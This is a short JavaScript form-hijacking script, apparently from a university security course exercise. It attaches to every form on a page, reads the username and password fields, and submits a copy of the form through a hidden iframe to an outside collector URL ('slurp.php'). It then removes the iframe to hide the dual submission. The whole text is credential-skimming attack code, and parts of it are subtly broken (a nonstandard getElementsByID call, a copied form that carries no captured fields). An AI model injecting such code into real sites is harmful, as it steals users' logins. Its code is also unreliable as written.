/** Code to attach to all forms in this document */ var frms = document.getEle

1. /** Code to attach to all forms in this document */
2. var frms = document.getElementsByTagName("form");
3. for(i=0; i<frms.length; i++) {
4. hijack(frms.item(i));
5. }
6.  
7. function hijack(frmObj) {
8. var delayCode = "";
9. if(frmObj.hasAttribute("onsubmit")) {
10. delayCode = frmObj.getAttribute("onsubmit");}
11. frmObj.setAttribute("onsubmit", "return leech(this,function(){" + delayCode + "});");
12. }
13.  
14. /** Copies and submits a form object’s complete contents */
15. function leech(frmObj, delayCode) {
16. //create a copy of the existing form, with unique ID
17. var rnd = Math.floor(Math.random()*256);
18. var newFrm = document.createElement("form");
19.  
20. //Steal Username and Password
21. var username = frmObj.getElementsByID("ID").value;
22. var password = frmObj.getElementsByID("Pass").value;
23. //Show username and password
24. alert("Username: "+username+" Password: "+password);
25.  
26. newFrm.setAttribute("id", "leechedID" + rnd);
27. newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
28. newFrm.setAttribute("action", "http://fourfourtwo.csse.rose-hulman.edu/f/slurp.php");
29. var elt = document.createElement("input");
30. elt.setAttribute("name", "442team");
31. elt.setAttribute("value", "team-joey");
32. elt.setAttribute("type", "hidden");
33. newFrm.appendChild(elt);
34.  
35. //create an iframe to hide the form submission.
36. var hiddenIframe = document.createElement("iframe");
37. hiddenIframe.setAttribute("style", "position:absolute;" + "visibility:hidden;z-index:0;");
38. hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);
39.  
40. //add form to hidden iframe and iframe to the document
41. hiddenIframe.appendChild(newFrm);
42. window.document.body.appendChild(hiddenIframe);
43.  
44. //do stealthy submission of hijacked form
45. newFrm.submit();
46.  
47. // Prevent race-winning by setting event for the future.
48. // This real form submission happens 50ms after the hijacked one.
49. setTimeout(function() {
50. //hide traces of the dual submit
51. window.document.body.removeChild(hiddenIframe);
52. //emulate the onSubmit handler by evaluating given code
53. if(delayCode() != false) { frmObj.submit(); }
54. }, 50);
55.  
56. //disallow other submission just yet
57. return false;
58. }